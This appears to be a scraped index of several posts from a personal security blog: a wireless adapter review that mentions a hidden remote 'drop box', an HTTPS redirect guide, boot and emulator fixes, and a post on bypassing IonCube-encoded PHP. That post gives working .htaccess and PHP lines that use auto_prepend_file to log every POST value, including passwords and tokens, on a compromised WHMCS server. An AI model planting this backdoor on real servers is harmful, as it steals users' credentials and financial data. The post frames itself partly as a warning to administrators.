wasn\u0026rsquo;t tested as the writer currently doesn\u0026rsquo;t own any supported devices.\nIt\u0026rsquo;s undoubtably a product worth checking out, especially for pentesters.\nWhat\u0026rsquo;s next Purchase two wireless cards based on the Atheros (AR 9590) chipset which uses the ath9k driver, preferably the Compex WLE350NX mini-pcie card. Atheros chipsets have great reputation when it comes to wireless penetration testing especially packet injection, this particular chipset supports 3x3:3 MIMO and 802.11a/n/b/g both 2.4GHz and 5GHz.\nWith the addition of a Laguna GW2387 SBC Single Board Computer or any that supports multiple mini-pice slots working simultaneously. This device would be a sort of like a drop box, a physical device that can be hidden somewhere in range of a target\u0026rsquo;s wireless network and accessed remotely via LTE on the attacker\u0026rsquo;s side.\n","permalink":"https://markuta.com/alfa-awus052nh-review/","title":"Alfa AWUS052NH Wireless USB Review"},{"categories":null,"contents":"I\u0026rsquo;ve seen plenty of websites that use https but don\u0026rsquo;t force it by default, this isn\u0026rsquo;t considered a good security practice and should be resolved promptly. Below lists five of the most popular web servers (Nginx, Apache, IIS, OpenLitespeed and Lighttpd) configurations to force HTTPS by default.\nAll tests were carried out on a local Debian Stretch server with the exception of IIS.\nAll http:// requests will be (301) Moved Permanently to https:// with respected request path.\nNginx Tested version 1.6.2. Configuration file /etc/nginx/sites-enabled/example.conf within the server{ } section:\nserver { listen 80; server_name www.example.com; return 301 https://$server_name$request_uri; } Apache Tested version 2.4.10. Configuration file /etc/apache/sites-enabled/httpd.conf within the \u0026lt;VirtualHost\u0026gt; section:\n\u0026lt;VirtualHost *:80\u0026gt; ServerName www.example.com DocumentRoot /var/www/html Redirect / https://www.example.com/ \u0026lt;/VirtualHost\u0026gt; IIS May require an additional module to be installed, more details available over at Microsoft\u0026rsquo;s guide. Configuration file web.config within the \u0026lt;rewrite\u0026gt; section:\n\u0026lt;rewrite\u0026gt; \u0026lt;rules\u0026gt; \u0026lt;rule name=\u0026#34;Force https\u0026#34; enabled=\u0026#34;true\u0026#34; patternSyntax=\u0026#34;Wildcard\u0026#34; stopProcessing=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;match url=\u0026#34;*\u0026#34; negate=\u0026#34;false\u0026#34; /\u0026gt; \u0026lt;conditions logicalGrouping=\u0026#34;MatchAny\u0026#34;\u0026gt; \u0026lt;add input=\u0026#34;{HTTPS}\u0026#34; pattern=\u0026#34;off\u0026#34; /\u0026gt; \u0026lt;/conditions\u0026gt; \u0026lt;action type=\u0026#34;Redirect\u0026#34; url=\u0026#34;https://{HTTP_HOST}{REQUEST_URI}\u0026#34; redirectType=\u0026#34;Found\u0026#34; /\u0026gt; \u0026lt;/rule\u0026gt; \u0026lt;/rules\u0026gt; \u0026lt;/rewrite\u0026gt; OpenLiteSpeed Tested version 1.4.26. Configuration file /usr/local/lsws/conf/vhosts/Example/vhconf.conf within the rewrite { } section. Alternatively edit settings through the provided WebAdmin (on port 7080) by navigating to Virtual Hosts \u0026gt; Rewrite \u0026gt; Rewrite Rules and add the following:\nRewriteCond %{HTTPS} !on RewriteRule ^(.*)$ https://%{SERVER_NAME}%{REQUEST_URI} [R,L] Lighttpd Tested version 1.4.35. Configuration file /etc/lighttpd/lighttpd.conf. The following will apply to all vhosts:\n$HTTP[\u0026#34;scheme\u0026#34;] == \u0026#34;http\u0026#34; { # Apply to all vhosts $HTTP[\u0026#34;host\u0026#34;] =~ \u0026#34;.*\u0026#34; { url.redirect = (\u0026#34;.*\u0026#34; =\u0026gt; \u0026#34;https://%0$0\u0026#34;) } } ","permalink":"https://markuta.com/force-https-on-web-servers/","title":"How to Force HTTPS on Web Servers"},{"categories":null,"contents":"Lets say a server has been exploited and an attacker wants to intercept data coming from a web application in order to gain sensitive information such as plaintext server passwords. Lets also say that application is WHMCS. One of the requirements is IonCube Loader which protects PHP source code from easy observation, theft and change by compiling into bytecode.\nSample of WHMCS with IonCube encoded source code When an encoded Ioncube file is changed in any way a 500 internal server error occurs.\nA simple trick of getting round files protected by IonCube or Zend Guard loaders for explicitly including our own code to perform malicious things, is by utilizing the PHP auto_prepend_file directive and the way a web server is configured. This of course means the attacker has already gained access and enough privileges. I\u0026rsquo;ve setup MAMP v4.1.1 running PHP v7.0.15 (Latest that Ioncube can support) with WHMCS v7.2.2.\nWhen using PHP as an Apache module, you can change the PHP configuration settings using .htaccess files if AllowOverride Options is set. Example below shows a .htaccess file that sets two values under WHMCS installation document_root.\nAn include path that locates our script A filename that\u0026rsquo;ll be automatically added before any PHP document php_value include_path \u0026#34;.:/Applications/MAMP/htdocs/whmcs\u0026#34; php_value auto_prepend_file \u0026#34;log.php\u0026#34; A PHP script called log.php is created for storing $_POST values.\n\u0026lt;?php file_put_contents(\u0026#39;/Applications/MAMP/htdocs/whmcs/templates_c/post_data.txt\u0026#39;, var_export($_POST, true)); ?\u0026gt; For simplicity\u0026rsquo;s sake, both .htaccess and log.php files are placed in the same path.\nExample of Intercepted Data ALL values that are sent through the super global variable $_POST are intercepted. Given the nature of WHMCS as a hosting Content Management System it can be extremely useful for attackers to implement such loggers. Plaintext; server configurations, passwords, financial information, tokens, private keys and much more.\nIn case of Nginx or other web servers, the attacker would change the main PHP configuration (php.ini) file by adding a value to the auto_prepend_file directive. Keeping in mind that this would effect every PHP script when loaded, the attacker may adjust the script to only target specific variables, or else the log file will be filled with junk and uninteresting information, not to mention increasing in size quite quickly.\nAdministrators should be wary of auto_prepend_file and auto_append_file PHP directives and its potential uses to attackers, backdoors of this nature can be particularly harmful to organisations processing sensitive data.\n","permalink":"https://markuta.com/being-evil-against-encoded-php-files/","title":"Being Evil against Encoded PHP Files"},{"categories":null,"contents":"I decided to install the latest stable branch of Debian Stretch on a budget laptop (Toshiba Satellite C50-B-14D) bought in 2015. Its minimal specs was perfect for Linux. Installation image used was debian-9.0.0-amd64-netinst.iso. Once the installation process finished and I restarted my system, it would not recognise grub or any boot partition.\nSolution Rename folder and filename /EFI/debian/grubx64.efi to /EFI/boot/bootx64.efi Read more: https://wiki.debian.org/UEFI#Booting_a_UEFI_machine_normally\nWith a different filename the UEFI implementation recognised and booted successfully. This might not work on all manunfacturers.\nCommands with Mac OS EL Capitan Below lists terminal commands used to quickly mount disks and rename files and folders using an external hard disk connected. Disk names may vary to yours.\n$ diskutil list $ diskutil mount /dev/disk2s1 $ cd /Volumes/NO\\ NAME/EFI/ $ mv debian boot $ cd boot $ mv grubx64.efi bootx64.efi $ sync $ diskutil umount /dev/disk2s1 ","permalink":"https://markuta.com/bad-uefi-implementation-workaround/","title":"Bad UEFI implementation Workaround"},{"categories":null,"contents":"While working on a virtual pentest lab in VMWare Fusion. I had the desire of emulating a Cisco router device on a virtual network. The tool I used Dynamics did exactly that. However, it was eating up all CPU resources, making other guests almost unusable.\nBelow shows VMware Fusion process running in Activity Monitor:\nFix Open the Dynagen Management console dynagen /opt/config.net and run idlepc get R1 (R1 is the name of the router) which will calculate a better Idle PC Value for the current guest. This may take a few seconds and should present you with the following:\nAs screenshot reads, select a number best suited for your system hinted by an (*). This change will apply for the current session only, meaning it will have to be set again once the program restarts.\nPersistent Change To make changes persistent, edit your configuration file e.g. /opt/config.net and include the idlepc keyword and the value calculated previously, in my case:\n# Simple lab [localhost] [[7200]] image = /opt/7200-images/c7200-jk9o3s-mz.124-25d.image npe = npe-400 ram = 256 # keep CPU usage below 100%. idlepc = 0x6079ca5c [[ROUTER R1]] f0/0 = NIO_linux_eth:eth0 f1/0 = NIO_linux_eth:eth1 I\u0026rsquo;ll post the full workings of my virtual network architecture in the near future.\n","permalink":"https://markuta.com/dynamips-cpu-fix/","title":"Dynamips at 100% CPU Usage Fix"}]